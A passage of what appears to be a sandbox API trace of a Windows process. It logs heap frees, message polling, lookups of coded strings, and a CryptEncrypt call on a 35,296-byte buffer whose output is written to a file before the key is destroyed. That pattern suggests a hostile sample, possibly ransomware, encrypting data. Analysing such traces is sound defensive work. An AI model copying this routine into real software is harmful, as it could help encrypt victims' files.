HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0211.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0211.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0211.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0211.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0211.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0211.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0211.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0211.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0211.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0211.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0211.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0211.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0211.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0211.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9bcf8 | out: hHeap=0x2af0000) returned 1 [0211.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0211.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab200 | out: hHeap=0x2af0000) returned 1 [0211.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0211.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0211.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0211.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0211.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0211.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0211.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0211.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0211.748] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0211.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0211.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0211.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0211.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0211.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0211.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0211.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0211.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0211.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0211.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0211.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0211.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0211.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0211.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0211.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab290, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0211.748] CryptEncrypt (in: hKey=0x9e1db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x89d8, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x89e0) returned 1 [0211.749] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.749] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.749] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.749] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.749] CharLowerBuffW (in: lpsz="byte[35296]", cchLength=0xb | out: lpsz="byte[35296]") returned 0xb [0211.749] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.750] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.750] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.750] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.750] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.750] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.750] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.750] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0211.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab320, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0211.751] CryptEncrypt (in: hKey=0x9e1db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a9bcf8*, pdwDataLen=0x8cef60*=0x89d8, dwBufLen=0x89e0 | out: pbData=0x2a9bcf8*, pdwDataLen=0x8cef60*=0x89e0) returned 1 [0211.752] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.752] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.752] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.752] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.752] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.752] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.752] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.752] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0211.752] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.752] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0211.752] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.752] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.752] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0211.752] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.752] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0211.753] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.753] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.753] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.753] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.753] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.753] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.753] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.753] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.753] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.753] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.753] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.753] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.756] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.756] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.756] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.756] WriteFile (in: hFile=0x4f4, lpBuffer=0x2a8a938*, nNumberOfBytesToWrite=0x89e0, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a8a938*, lpNumberOfBytesWritten=0x8cf5e4*=0x89e0, lpOverlapped=0x0) returned 1 [0211.758] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.758] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.758] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0211.758] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.758] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0211.758] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.758] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.758] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.758] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0211.758] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.758] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0211.758] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0211.758] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0211.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab0e0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0211.758] CryptDestroyKey (hKey=0x9e1db8) returned 1 [0211.758] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.758] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.758] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0211.758] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.758] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0211.759] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.759] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.759] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0211.759] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0211.759] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0211.759] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0211.759] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0211.759] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0211.759] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.759] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.759] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0211.759] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.759] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0211.759] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0211.759] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.759] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.759] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.759] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.759] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.760] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0211.760] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.760] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0211.760] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.760] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.760] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0211.760] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.761] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0211.761] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.761] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.761] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.761] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.761] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.761] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0211.761] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.761] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0211.761] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0211.761] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.761] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.761] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.761] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.761] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.761] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.761] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0211.761] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.761] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0211.761] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.761] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.761] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0211.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7160, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0211.762] CryptReleaseContext (hProv=0xa7bd58, dwFlags=0x0) returned 1 [0211.762] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.762] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.762] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.762] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.762] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, 